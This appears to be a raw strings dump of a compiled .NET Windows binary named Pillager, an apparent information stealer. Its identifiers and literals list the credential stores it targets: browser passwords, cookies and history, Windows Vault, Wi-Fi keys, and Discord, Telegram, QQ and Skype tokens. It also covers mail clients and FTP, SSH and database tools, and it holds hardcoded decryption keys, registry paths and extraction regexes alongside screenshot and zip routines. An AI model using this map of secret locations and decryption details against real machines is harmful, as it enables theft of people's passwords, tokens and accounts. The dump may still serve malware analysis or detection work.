!This program cannot be run in DOS mode.
`.rsrc
@.reloc
jZ ci
Y ?_ci*
i Y(V
i Y(V
i Y(V
i Y(V
KDBM(
v2.0.50727
#Strings
(*(o(Z(
&N(d(5(
__StaticArrayInitTypeSize=10
__StaticArrayInitTypeSize=20
1213DCCBA29EDDA390350D7BAB8C5E29515A6949F1D668C3C3125BDE5F114A50
E348FD3C79BAE72850626B7DF613E6210E9BFEE17841F32B1CCB4C576CBE5280
FA1AD270B23BA640E88EE7F51CC9C0C1A6C6BB1F2B9025682A7D30FB3BDA64F0
<>9__1_0
<EncryptInitalize>b__1_0
<StringToByteArray>b__1_0
<>c__DisplayClass1_0
<>9__32_0
<SetA>b__32_0
<>c__DisplayClass2_0
<IE_passwords>g__GetVaultElementValue|3_0
<>9__54_0
<ParseValue>b__54_0
<>c__DisplayClass4_0
<>9__0
<DecryptWithoutMP>b__0
<GetArr>b__0
<EncryptOutput>b__0
D38F1F4A152CEB94D7366FB851BD64D0C557CD57A0486E57BFB5926A910D5111
HMACSHA1
<>9__1
<DecryptWithoutMP>b__1
<StringToByteArray>b__1
<>c__DisplayClass31_0`1
<>c__32`1
IEnumerable`1
Predicate`1
Action`1
IEnumerator`1
List`1
<>7__wrap1
<>m__Finally1
__StaticArrayInitTypeSize=32
kernel32
Microsoft.Win32
ReadUInt32
ReadInt32
ToInt32
__StaticArrayInitTypeSize=72
39D3523C2701B843470935A44285EB7ECA57D0AD93B65C106443CC46BA3B70F2
DecryptV2
Func`2
KeyValuePair`2
Dictionary`2
Pbkdf2
<>7__wrap2
<>m__Finally2
ToUInt64
ReadInt64
ToInt64
<line>5__4
32D08A08F1E0B79A994ED903C36A7956E36F1C99D68FDB67460ACAAC83CA9C06
__StaticArrayInitTypeSize=16
ReadUInt16
ToUInt16
ReadInt16
HMACSHA256
__StaticArrayInitTypeSize=4096
__StaticArrayInitTypeSize=6
4644D25C296EA1EDD5CA2B89F2032ACB2831E8D6D2BB65F379E56AE3E993AD27
<Lines>d__57
VAULT_ITEM_WIN7
VaultGetItem_WIN7
499F259249758EA3145B591255CD757DCEE6AEA1698483E9DEBC966C58CC1EE8
get_UTF8
EncodeUTF8
VAULT_ITEM_WIN8
VaultGetItem_WIN8
337E14160109F30E3844660DB943B9794D8911CE199D337317AAACA366B591D9
7D78CB380BF5EFB7B851409CA6A875F77DECF09D19B9149DA17A3EBF674BC0F9
<Module>
<PrivateImplementationDetails>
7B898A2E22E9A17153213DEBB16D4ED2B7E97240F8E4E407942526A0BB86DB0A
PROCESS_SET_QUOTA
BCRYPT_KEY_DATA_BLOB
DecryptCBC
EncryptCBC
BCRYPT_KEY_DATA_BLOB_MAGIC
PW_MAGIC
PROCESS_CREATE_THREAD
PROCESS_VM_READ
VAULT_SCHEMA_ELEMENT_ID
ProcessID
GetRawID
MozillaPBE
GetIntBE
PutIntBE
BCRYPT_CHAINING_MODE
PROCESS_DUP_HANDLE
LARGE_PRIME
SMALL_PRIME
PROCESS_SUSPEND_RESUME
POOL_TYPE
VAULT_ELEMENT_TYPE
PROCESS_TERMINATE
PROCESS_VM_WRITE
SYNCHRONIZE
BLOCK_SIZE
F18366628A466F286AC60A27D59CADD5FD347730C9D55E04CE70FFDA96CB236F
B9E288FA0365803938930D9782FBBFA1DC34E6629F6956B71C4AFA87CD69D08F
BCRYPT_AUTH_MODE_CHAIN_CALLS_FLAG
PW_FLAG
GENERIC_MAPPING
UNICODE_STRING
STATUS_AUTH_TAG_MISMATCH
STATUS_INFO_LENGTH_MISMATCH
BCRYPT_AUTH_TAG_LENGTH
BCRYPT_OBJECT_LENGTH
get_ASCII
FromINI
GetINI
IO_STATUS_BLOCK
SECURITY_IMPERSONATION_LEVEL
get_formSubmitURL
set_formSubmitURL
BCRYPT_CHAIN_MODE_GCM
BCRYPT_AES_ALGORITHM
BCRYPT_INIT_AUTH_MODE_INFO_VERSION
PROCESS_QUERY_LIMITED_INFORMATION
CNST_SYSTEM_HANDLE_INFORMATION
OBJECT_TYPE_INFORMATION
PROCESS_SET_INFORMATION
PROCESS_QUERY_INFORMATION
PROCESS_VM_OPERATION
DEFAULT_SECTION
loginJSON
TortoiseSVN
WLAN_INTERFACE_INFO
BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO
WLAN_PROFILE_INFO
BCRYPT_OAEP_PADDING_INFO
BCRYPT_PSS_PADDING_INFO
System.IO
DecryptNextCharacterWinSCP
BCRYPT_PAD_OAEP
DecryptWithMP
DecryptWithoutMP
CoreFTP
SessionP
MS_PRIMITIVE_PROVIDER
decryptMoz3DES
PROCESS_ACCESS_FLAGS
FILE_INFORMATION_CLASS
OBJECT_INFORMATION_CLASS
DUPLICATE_SAME_ACCESS
PROCESS_ALL_ACCESS
ERROR_SUCCESS
STATUS_SUCCESS
PROCESS_CREATE_PROCESS
BCRYPT_PAD_PSS
NonPagedPoolCacheAlignedMustS
VAULT_ITEM_ELEMENT
SecureCRT
WLAN_INTERFACE_INFO_LIST
WLAN_PROFILE_INFO_LIST
get_IV
set_IV
get_partIV
set_partIV
value__
FileZilla
Enigma
get_Data
set_Data
cbData
ProtectedData
encryptedData
cbAuthData
pbAuthData
DecryptData
mscorlib
System.Collections.Generic
NeteaseCloudMusic
AddStreamAsync
FromFileTimeUtc
get_Id
SchemaId
schemaId
pszAlgId
dwProcessId
SchemaElementId
GenericRead
nNumberOfBytesToRead
lpNumberOfBytesRead
get_everSynced
set_everSynced
NonPagedPoolMustSucceed
SHA1Managed
SHA256Managed
RijndaelManaged
AesManaged
get_timePasswordChanged
set_timePasswordChanged
LastModified
Interlocked
NonPagedPoolCacheAligned
Undefined
lpOverlapped
SecurityRequired
get_timesUsed
set_timesUsed
get_timeLastUsed
set_timeLastUsed
defaultSectionLowerCased
get_timeCreated
set_timeCreated
encrypted
pReserved
pPackageSid
get_id
set_id
row_id
InterfaceGuid
interfaceGuid
vaultGuid
get_guid
set_guid
get_passwordField
set_passwordField
get_usernameField
set_usernameField
<formSubmitURL>k__BackingField
<IV>k__BackingField
<partIV>k__BackingField
<Data>k__BackingField
<everSynced>k__BackingField
<timePasswordChanged>k__BackingField
<timesUsed>k__BackingField
<timeLastUsed>k__BackingField
<timeCreated>k__BackingField
<id>k__BackingField
<guid>k__BackingField
<passwordField>k__BackingField
<usernameField>k__BackingField
<encryptedPassword>k__BackingField
<MasterPassword>k__BackingField
<BrowserName>k__BackingField
<encryptedUsername>k__BackingField
<hostname>k__BackingField
<Type>k__BackingField
<encType>k__BackingField
<BrowserPath>k__BackingField
<Algorithm>k__BackingField
<httpRealm>k__BackingField
<syncCounter>k__BackingField
<encryptedUnknownFields>k__BackingField
<profiles>k__BackingField
<objects>k__BackingField
<Lenght>k__BackingField
<Salt>k__BackingField
<GlobalSalt>k__BackingField
<EntrySalt>k__BackingField
<IterationCount>k__BackingField
<cipherText>k__BackingField
<Key>k__BackingField
<MasterKey>k__BackingField
GetField
record_header_field
ReadToEnd
AppEnd
Append
get_Second
InvokeMethod
dwMoveMethod
_method
MailBird
passWord
WriteEndRecord
WriteCentralDirRecord
Discord
DecryptWinSCPPassword
get_encryptedPassword
set_encryptedPassword
get_MasterPassword
set_MasterPassword
masterPassword
DecryptPassword
password
DecryptPwd
passwd
Replace
IsWhiteSpace
IdentityReference
Sequence
cbNonce
pbNonce
MatchDataSource
_source
Resource
VSCode
set_Mode
FileMode
dwShareMode
PaddingMode
chainingMode
CryptoStreamMode
CompressionMode
CipherMode
XmlNode
desDecode
get_Unicode
get_BigEndianUnicode
FromImage
CentralDirImage
TotalHandleTableUsage
HighWaterHandleTableUsage
TotalPagedPoolUsage
TotalNonPagedPoolUsage
HighWaterNonPagedPoolUsage
HighWaterPagedPoolUsage
TotalNamePoolUsage
HighWaterNamePoolUsage
get_Message
GetMessage
CompareExchange
Snowflake
Invoke
CrcTable
ReadTable
ReadMasterTable
GetEnvironmentVariable
Enumerable
IDisposable
Double
RuntimeFieldHandle
hSourceHandle
GetFileHandle
fileHandle
RuntimeTypeHandle
WlanCloseHandle
DuplicateHandle
GetTypeFromHandle
DuplicateTokenHandle
ExistingTokenHandle
WlanOpenHandle
pHandle
hSourceProcessHandle
GetProcessHandle
hTargetProcessHandle
processHandle
ObjectHandle
lpTargetHandle
bInheritHandle
vaultHandle
hClientHandle
clientHandle
Rectangle
ParseRDGFile
ReadFile
AddFile
ReadLockedFile
CreateFile
hTemplateFile
ReadConfigFile
ParseLoginFile
NtQueryInformationFile
WlanGetProfile
get_MainModule
ProcessModule
DecryptSSH1Style
EncryptSSH1Style
FTPName
get_Name
TableName
get_FileName
lpFileName
GetTempFileName
GetFileName
GetProcessIDByFileName
FindHandleByFileName
DuplicateHandleByFileName
strProfileName
profileName
get_MachineName
SoftwareName
baseName
valueName
MailName
get_FullName
ToolName
get_UserDomainName
sectionName
SystemInfoName
MessengerName
get_UserName
GetProcessUserName
userName
get_BrowserName
set_BrowserName
get_ProcessName
TryGetName
GetProcessesByName
pszCredentialFriendlyName
GetDirectoryName
astable_name
item_name
NormalizedFilename
_filename
_pathname
get_encryptedUsername
set_encryptedUsername
username
get_hostname
set_hostname
_modTime
ToFileTime
DateTime
GetLastWriteTime
CreationTime
DateTimeToDosTime
AccessTime
ModifyTime
Chrome
ReadLine
AppendLine
WriteLine
AddIniLine
ReplaceIniLine
newIniLine
get_NewLine
Combine
LocalMachine
Escape
DataProtectionScope
get_Type
set_Type
pszBlobType
get_encType
set_encType
LineType
ValueType
PoolType
DontUseThisType
ObjectType
GetType
item_type
IniListContainstype
FileShare
Compare
SetProcessDPIAware
System.Core
PtrToStructure
get_InvariantCulture
Capture
passphrase
System.IDisposable.Dispose
dataToParse
TryParse
Reverse
Create
Delegate
Deflate
ExpandState
InitializeState
<>1__state
Delete
GenericWrite
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
HandleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
DebuggerHiddenAttribute
ExtensionAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
FlagsAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
ParamArrayAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
GenericExecute
get_Minute
Compute
ReadByte
ToByte
DESCBCDecryptorByte
get_Value
ParseValue
TryGetValue
SetValue
DecryptValue
ParseKeyValue
recursive
Native
lDistanceToMove
Remove
Pillager.exe
get_Size
cbSize
CompressedSize
FileSize
SQLDataTypeSize
MaxAuthTagSize
get_HashSize
set_FeedbackSize
set_BlockSize
chunkSize
HeaderSize
set_KeySize
Initialize
EncryptInitalize
page_size
Resize
PadToMultipleOf
SizeOf
LastIndexOf
BcryptPbkdf
srcOff
destOff
RevertToSelf
authTag
get_Jpeg
config
JavaRng
System.Threading
set_Padding
GetEncoding
DefaultEncoding
encoding
System.Drawing.Imaging
Ceiling
add_LogWarning
remove_LogWarning
FireLogWarning
GenericMapping
FromBase64String
ToBase64String
LoadFromString
ToString
GetString
OctetString
BitString
DecryptString
hexString
Substring
ForceDeflating
System.Drawing
nextLong
SQLyog
IsMatch
lpDistanceToMoveHigh
get_Hash
ComputeHash
BcryptHash
Blowfish
blowfish
RDGPath
GetDataPath
filePath
GetInstallPath
loginsJsonPath
GetTempPath
GetAppDataFolderPath
SHGetFolderPath
MessengerPath
get_BrowserPath
set_BrowserPath
rootPath
pszPath
savepath
get_Width
get_Length
NameLength
MaximumLength
SystemInformationLength
ObjectInformationLength
returnLength
SetLength
length
EndsWith
StartsWith
get_Month
PtrToStringUni
Pixini
Wlanapi
FlushFinalBlock
TransformFinalBlock
TransformBlock
pInfoBlock
IoStatusBlock
get_CanSeek
DingTalk
GrabOutlook
AccessMask
defaultVal
AllocHGlobal
FreeHGlobal
Illegal
Marshal
Decimal
System.Security.Principal
cbLabel
pbLabel
System.ComponentModel
Foxmail
GenericAll
SaveAll
advapi32.dll
kernel32.dll
shell32.dll
user32.dll
vaultcli.dll
Wlanapi.dll
wlanapi.dll
ntdll.dll
bcrypt.dll
FinalShell
System.Xml
LoadXml
profileXml
NonPagedPool
AddStream
ZipFileStream
DeflateStream
CryptoStream
MemoryStream
_stream
Telegram
Program
AesGcm
get_Item
set_Item
VaultGetItem
vaultItem
OperatingSystem
get_Algorithm
set_Algorithm
SymmetricAlgorithm
phAlgorithm
KeyedHashAlgorithm
algorithm
get_httpRealm
set_httpRealm
CanConvertFrom
MobaXterm
ICryptoTransform
browserOnChromium
root_num
row_num
RDCMan
Boolean
IsLittleEndian
inputLen
CopyFromScreen
SetThreadToken
DuplicateToken
hToken
ImpersonateProcessToken
OpenProcessToken
GetToken
keylen
_leaveOpen
SeekOrigin
GetFileNameWithoutExtension
get_OSVersion
get_Version
pdwNegotiatedVersion
dwInfoVersion
dwClientVersion
System.IO.Compression
FileEaInformation
FileFullEaInformation
FileQuotaInformation
FileBasicInformation
ObjectBasicInformation
FileObjectIdInformation
FileStandardInformation
FileModeInformation
FileIoStatusBlockRangeInformation
systemHandleInformation
ObjectHandleInformation
FileEndOfFileInformation
FileProcessIdsUsingFileInformation
fileInformation
FileNormalizedNameInformation
FileNameInformation
FileAlternateNameInformation
FileNetworkPhysicalNameInformation
ObjectNameInformation
FileShortNameInformation
FileRenameInformation
FileSfioVolumeInformation
FilePipeInformation
ObjectTypeInformation
FilePipeRemoteInformation
FileSfioReserveInformation
FileAttributeTagInformation
FileTrackingInformation
FileValidDataLengthInformation
FileHardLinkInformation
FileLinkInformation
FilePipeLocalInformation
FileInternalInformation
FileAllInformation
FileStreamInformation
NtQuerySystemInformation
FileMaximumInformation
FileNetworkOpenInformation
FileCompressionInformation
FileIoCompletionNotificationInformation
FileAllocationInformation
FileCompletionInformation
FilePositionInformation
FileDispositionInformation
FileMoveClusterInformation
FileNamesInformation
ObjectAllTypesInformation
FileAccessInformation
ObjectInformation
FileMailslotSetInformation
FileAlignmentInformation
FileIoPriorityHintInformation
FileReparsePointInformation
FileMailslotQueryInformation
FileDirectoryInformation
FileIdBothDirectoryInformation
FileBothDirectoryInformation
FileIdFullDirectoryInformation
FileFullDirectoryInformation
CopyPixelOperation
pszImplementation
System.Globalization
ParseSection
DeleteSection
HandleDefaultSection
currentSection
System.Reflection
MatchCollection
GroupCollection
ManagementObjectCollection
KeyCollection
section
get_Position
set_Position
dwCreationDisposition
SearchOption
CryptographicException
NotSupportedException
DirectoryNotFoundException
ArgumentOutOfRangeException
ArgumentNullException
InvalidOperationException
ArgumentException
strInterfaceDescription
StringComparison
CompareTo
CopyTo
CreateExtraInfo
FieldInfo
InterfaceInfo
ReadFileInfo
ProfileInfo
GetLineInfo
CultureInfo
pPaddingInfo
FileSystemInfo
ConnectionInfo
GetInfo
DirectoryInfo
PropertyInfo
sectionMap
Bitmap
FilenameInZip
_filenameInZip
_pathnameInZip
TimeStamp
get_Top
InstalledApp
System.Linq
get_qq
get_Year
ToChar
DirectorySeparatorChar
CountChar
quotechar
Asn1Der
lineNumber
WriteLocalHeader
StringReader
StreamReader
TextReader
BinaryReader
SHA1CryptoServiceProvider
SHA512CryptoServiceProvider
TripleDESCryptoServiceProvider
BCryptCloseAlgorithmProvider
BCryptOpenAlgorithmProvider
IFormatProvider
provider
StringBuilder
SpecialFolder
nFolder
GetCommonDocumentsFolder
structureOrder
lpBuffer
buffer
Pillager
Xmanager
ConvertToInteger
ManagementObjectSearcher
Navicat11Cipher
blowfishCipher
ObjectIdentifier
SecurityIdentifier
SQLiteHandler
hwndOwner
Pillager.Helper
TripleDESHelper
ToUpper
ZipStorer
get_User
AllUser
CurrentUser
KeyCrafter
StreamWriter
TextWriter
BinaryWriter
Object_Pointer
SetFilePointer
get_syncCounter
set_syncCounter
TypeConverter
GetConverter
BitConverter
converter
MailMaster
DBeaver
ToLower
sourceDir
destinationDir
BlockXor
get_Major
get_Minor
add_LogError
remove_LogError
FireLogError
Authenticator
inputKVSeparator
outputKVSeparator
IndexOfKvSeparator
IEnumerator
ManagementObjectEnumerator
GetEnumerator
.cctor
TypeDescriptor
DESCBCDecryptor
CreateDecryptor
CreateEncryptor
GetArr
passwordVaultPtr
ReadIntPtr
vaultElementPtr
get_Hour
Pillager.FTPs
Graphics
System.Diagnostics
get_encryptedUnknownFields
set_encryptedUnknownFields
get_Bounds
rounds
Methods
IE_passwords
Chrome_passwords
FireFox_passwords
WlanEnumInterfaces
System.Runtime.InteropServices
System.Runtime.CompilerServices
sources
DebuggingModes
SelectNodes
Matches
Chrome_cookies
Skype_cookies
Sogou_cookies
FireFox_cookies
GetDirectories
master_table_entries
TotalNumberOfHandles
HighWaterNumberOfHandles
GetHandles
GetAllAccessibleFiles
ExistingFiles
sessionFiles
GetFiles
get_profiles
set_profiles
NumberStyles
GetTableNames
GetValueNames
get_SectionNames
GetSubKeyNames
field_names
ReadAllLines
WriteAllLines
Pillager.Softwares
Sesspasses
GetProcesses
InvalidAttributes
dwFlagsAndAttributes
lpSecurityAttributes
encryptedBytes
FindBytes
ReadAllBytes
WriteAllBytes
plainBytes
BufferBytes
XorBytes
GetBytes
RightBytes
db_bytes
UpdateCrcAndSizes
ProfileFLags
WlanProfileFlags
dwFlags
DiscordPaths
MessengerPaths
sessionpaths
<>4__this
IE_books
Chrome_books
FireFox_books
Equals
Pillager.Mails
Pillager.Tools
VaultEnumerateItems
dwNumberOfItems
dwNumberofItems
ParseLoginItems
System.Windows.Forms
get_AllScreens
Contains
decryptLogins
StringExtensions
Chrome_extensions
DecryptSessions
System.Text.RegularExpressions
iterations
emptyLinesBetweenSections
System.Collections
InvokeMethodOptions
dwOptions
RegexOptions
Pillager.SystemInfos
get_Groups
get_Chars
Pillager.Messengers
RuntimeHelpers
Pillager.Browsers
GetMethodParameters
emptyLinesBetweenKeyValuePairs
decodePass
remainingPass
rawPass
SystemInformationClass
ObjectInformationClass
sha2pass
dwDesiredAccess
pdwGrantedAccess
ValidAccess
FileAccess
get_Success
IsWow64Process
wow64Process
NtSuspendProcess
NtResumeProcess
hProcess
OpenProcess
GetCurrentProcess
PostProcess
TotalNumberOfObjects
HighWaterNumberOfObjects
get_objects
set_objects
VaultEnumerateVaults
clients
pPropertyElements
emptyLineAboveComments
get_Exists
SectionExists
saveBackupOfPrevious
Status
arrays
get_Keys
RemoveAt
Navicat
Concat
Repeat
AppendFormat
ImageFormat
PixelFormat
Subtract
ManagementBaseObject
hObject
Asn1DerObject
ManagementObject
cbKeyObject
pbKeyObject
NtQueryObject
Select
Unprotect
iniStruct
System.Collections.IEnumerator.Reset
FileOffset
ReadTableFromOffset
inOffset
HeaderOffset
outOffset
inputOffset
outputOffset
d_offset
s_offset
get_Left
get_Height
get_Lenght
set_Lenght
op_Explicit
get_Salt
set_Salt
cbSalt
get_GlobalSalt
set_GlobalSalt
get_EntrySalt
set_EntrySalt
sha2salt
VaultOpenVault
get_Default
pcbResult
UnsignedInt
GetBytesFromInt
nextInt
mailClient
smptClient
System.Management
pResourceElement
pAuthenticatorElement
pIdentityElement
sql_statement
ParseLineComment
_comment
Environment
XmlDocument
GetParent
System.Collections.Generic.IEnumerator<System.String>.Current
System.Collections.IEnumerator.Current
System.Collections.Generic.IEnumerator<System.String>.get_Current
System.Collections.IEnumerator.get_Current
GetCurrent
<>2__current
content
get_Count
MaintainHandleCount
vaultItemCount
get_IterationCount
set_IterationCount
dwPropertiesCount
vaultCount
GetRowCount
ScreenShot
RC4Crypt
Bcrypt
AESDecrypt
OldDecrypt
BlockDecrypt
BCryptDecrypt
NewDecrypt
AESEncrypt
BlockEncrypt
TrimStart
AppStart
Insert
Convert
UnsignedShort
ppInterfaceList
XmlNodeList
ppProfileList
WlanGetProfileList
profileList
MaintainTypeList
GetSectionList
ToList
pathlist
cbInput
pbInput
cbOutput
pbOutput
EncryptOutput
output
MoveNext
System.Text
ReadAllText
WriteAllText
_bcryptCipherText
get_cipherText
set_cipherText
get_InnerText
cbMacContext
pbMacContext
Ciphertext
ciphertext
OldSogou
keyHex
BufferEndIndex
endIndex
FindIndex
CreatorBackTrackIndex
BlockIndex
BufferStartIndex
startIndex
dwIndex
GetKeyIndex
fromhex
FireFox
blowfish_pbox
blowfish_sbox
get_Day
ProtectedArray
ConvertHexStringToByteArray
InitializeArray
ToArray
ToCharArray
get_IsArray
ivArray
keyArray
GroupPolicy
get_Key
set_Key
OpenSubKey
jdbcKey
privateKey
InitializeKey
ranDomKey
CustomUserKey
get_MasterKey
set_MasterKey
GetMasterKey
ContainsKey
hImportKey
BCryptImportKey
BCryptDestroyKey
RegistryKey
System.Security.Cryptography
Multiply
BlockCopy
ObjectQuery
SelectQuery
AddDirectory
CreateDirectory
CopyDirectory
IE_history
Chrome_history
Sogou_history
FireFox_history
ZipFileEntry
table_entry
sqlite_master_entry
GetInfoFromRegistry
op_Equality
op_Inequality
System.Security
WindowsIdentity
IsNullOrEmpty
BCryptSetAlgorithmProperty
BCryptGetProperty
BCryptSetProperty
pszProperty
O5*F6D
WrapNonExceptionThrows
Pillager
Copyright
2023
$2dfb5bea-c5b3-4639-8d37-b6149d665eca
1.0.0.0
D:\a\Pillager\Pillager\Pillager\obj\Release\Pillager.pdb
_CorExeMain
mscoree.dll
iciNWq
Ze2Zh@
A4x{%`
BFUa.X
w``u N
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
BQBMSQ
+ -$9'B+
=#>#?'@'A'B'C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z.[.\0]0^1_1`1a5b:c:d:e:f:g:h:
Pillager
system
explorer
\"(?<key>[^"]+)\"\s*:\s*\{\s*\"#connection\"\s*:\s*\{\s*\"user\"\s*:\s*\"(?<user>[^"]+)\"\s*,\s*\"password\"\s*:\s*\"(?<password>[^"]+)\"\s*\}\s*\}
password
username:
password:
)":\s*{[^}]+?"url":\s*"([^"]+)"[^}]+?}
host:
DBeaverData\workspace6\General\.dbeaver\data-sources.json
DBeaverData\workspace6\General\.dbeaver\credentials-config.json
babb4a9f774ab853c96c2d653dfe544a
00000000000000000000000000000000
DBeaver
\finalshell\conn
_connect_config.json
"user_name":"(.*?)"
"password":"(.*?)"
"host":"(.*?)"
"port":(.*?),
port:
user_name:
FinalShell
bound must be positive
SessionP
Sesspass
passwords
credentials
Passwords:
Credentials:
SOFTWARE\Mobatek\MobaXterm
MobaXterm.ini
MobaXterm\MobaXterm.ini
0d5e9n1348/U2+67
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/
MobaXterm
Navicat
NavicatMSSQL
SQL Server
NavicatOra
Oracle
NavicatPG
NavicatMARIADB
MariaDB
NavicatMONGODB
MongoDB
NavicatSQLite
SQLite
Software\PremiumSoft\
\Servers
DatabaseName:
UserName
ConnectName:
hostname:
Software\PremiumSoft
\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
//FilesToOpen
//server
profileName
userName
domain
profilename:
decrypted:
RDCMan
Software\VanDyke\SecureCRT
Config Path
Sessions
__FolderData__.ini
S:"Password"
S:"Password"=
S:"Password V2"
S:"Password V2"=
SecureCRT
Password
Isencrypted
SQLyog\sqlyog.ini
sqlyog.ini
sqlyog_decrypted.ini
SQLyog
Subversion\auth\svn.simple
passtype
wincrypt
svn.simple.decrypted
TortoiseSVN
Session File:
Version:
Host:
UserName:
rawPass:
Version=(.*)
Host=(.*)
UserName=(.*)
Password=(.*)
!X@s#h$e%l^l&
Decrypt rawPass:
Xmanager
Netease\CloudMusic\info
userinfo.url
[InternetShortcut]
URL=https://music.163.com/#/user/home?id=
NeteaseCloudMusic
Code\User\History
History
VSCode
Software\Microsoft\Windows\CurrentVersion\Uninstall
DisplayName
Windows
InstalledApp
ScreenShot
Found
SSIDs:
============================
//*[name()='WLANProfile']/*[name()='SSIDConfig']/*[name()='SSID']/*[name()='name']
//*[name()='WLANProfile']/*[name()='MSM']/*[name()='security']/*[name()='sharedKey']/*[name()='keyMaterial']
SSID:
Password:
----------------------------
DingTalk\globalStorage\storage.db
DingTalk\globalStorage\storage.db-shm
DingTalk\globalStorage\storage.db-wal
storage.db
storage.db-shm
storage.db-wal
DingTalk
Local State
"encrypted_key":"(.*?)"
Local Storage\leveldb
dQw4w9WgXcQ:([^.*\['(.*)'\].*$][^"]*)
token.txt
Discord
Discord PTB
DiscordPTB
Discord Canary
DiscordCanary
sticker
SOFTWARE\Enigma\Enigma
device_id
device_id.txt
Enigma
Enigma\Enigma
Data/Line.ini
Line.ini
Computer Name =
User Name =
infp.txt
Tencent\QQ\UserDataInfo.ini
UserDataSavePathType
UserDataSet
Tencent Files
UserDataSavePath
All Users
\\.\Pipe\
\\.\Pipe\QQ_
All QQ number:
Online QQ number:
QQ.txt
Network\Cookies
cookies
host_key
skypetoken_asm
{skypetoken}={
_Desktop.txt
_Store.txt
Microsoft\Skype for Desktop
Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\LocalCache\Roaming\Microsoft\Skype for Store
Telegram
tdata_
\tdata_
\D877F783D5D3EF8C
\A7FDF864FBC10B77
\F8806DD0C461824F
\C2B05980D9127787
\0CA814316818D8F6
Telegram Desktop
tdata\key_datas
tdata\D877F783D5D3EF8Cs
tdata\D877F783D5D3EF8C\configs
tdata\D877F783D5D3EF8C\maps
tdata\A7FDF864FBC10B77s
tdata\A7FDF864FBC10B77\configs
tdata\A7FDF864FBC10B77\maps
tdata\F8806DD0C461824Fs
tdata\F8806DD0C461824F\configs
tdata\F8806DD0C461824F\maps
tdata\C2B05980D9127787s
tdata\C2B05980D9127787\configs
tdata\C2B05980D9127787\maps
tdata\0CA814316818D8F6s
tdata\0CA814316818D8F6\configs
tdata\0CA814316818D8F6\maps
SOFTWARE\Classes\Foxmail.url.mailto\Shell\open\command
Foxmail.exe
Storage
Accounts
\Accounts
FMStorage.list
Foxmail
Mailbird\Store\Store.db
Server_Host
Username
EncryptedPassword
Server_Host:
Username:
Password:
OAuth2Credentials
AuthorizedAccountId
AccessToken
AuthorizedAccountId:
AccessToken:
MailBird
Netease\MailMaster\data\app.db
Account
DataPath
Netease\MailMaster\data
MailMaster
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
SMTP Email Address
SMTP Server
POP3 Server
POP3 User Name
SMTP User Name
NNTP Email Address
NNTP User Name
NNTP Server
IMAP Server
IMAP User Name
HTTP User
HTTP Server URL
POP3 User
IMAP User
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTPMail Password
SMTP Password
{0}: {1}
result.txt
Outlook
^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$
^(?!:\/\/)([a-zA-Z0-9-_]+\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}?$
Native.BCryptDecrypt() (get size) failed with status code: {0}
Native.BCryptDecrypt(): authentication tag mismatch
Native.BCryptDecrypt() failed with status code:{0}
Native.BCryptOpenAlgorithmProvider() failed with status code:{0}
Native.BCryptSetAlgorithmProperty(Native.BCRYPT_CHAINING_MODE, Native.BCRYPT_CHAIN_MODE_GCM) failed with status code:{0}
Native.BCryptImportKey() failed with status code:{0}
Native.BCryptGetProperty() (get size) failed with status code:{0}
Native.BCryptGetProperty() failed with status code:{0}
SEQUENCE {
{0:X2}
INTEGER
OCTETSTRING
OBJECTIDENTIFIER
OxychromaticBlowfishSwatDynamite
3DC5CA39
default
[line {0}] WARN: {1}
[line {0}] ERR: {1}
Key names can't contain spaces. {0} was truncated to {1}
{0}{1}{4}{2}{4} ;{3}
{0}{1}{2} ;{3}
{0}{1}{3}{2}{3}
{0}{1}{2}
Source directory not found:
Select * from Win32_Process WHERE processID=
GetOwner
SYSTEM
ObjectLength
ChainingModeGCM
AuthTagLength
ChainingMode
KeyDataBlob
Microsoft Primitive Provider
algorithm
Algorithm cannot be null.
Password cannot be null.
Salt cannot be null.
Derived key too long.
Writing is not alowed
Writing is not allowed
SQLite format 3
Not a valid SQLite 3 Database File
Auto-vacuum capable database is not supported
UNIQUE
Software\FTPWare\CoreFTP\Sites
Server:
{0}:{1}
hdfzpysvpzimorhk
The binary key cannot have an odd number of digits: {0}
CoreFTP
FileZilla\recentservers.xml
FileZilla
USERPROFILE
snowflake-ssh\session-store.json
session-store.json
Snowflake
0123456789ABCDEF
Software\Martin Prikryl\WinSCP 2\Sessions
HostName
rawpass:
WinSCP
cookies.sqlite
moz_cookies
places.sqlite
moz_places
moz_bookmarks
logins.json
key4.db
metadata
item2)
2A864886F70D010C050103
ISO-8859-1
password-check
2A864886F70D01050D
nssPrivate
[URL] -> {
[USERNAME] -> {
[^\u0020-\u007F]
[PASSWORD] -> {
encType
timesUsed
timeCreated
timeLastUsed
timePasswordChanged
_cookies.txt
_history.txt
_books.txt
_passwords.txt
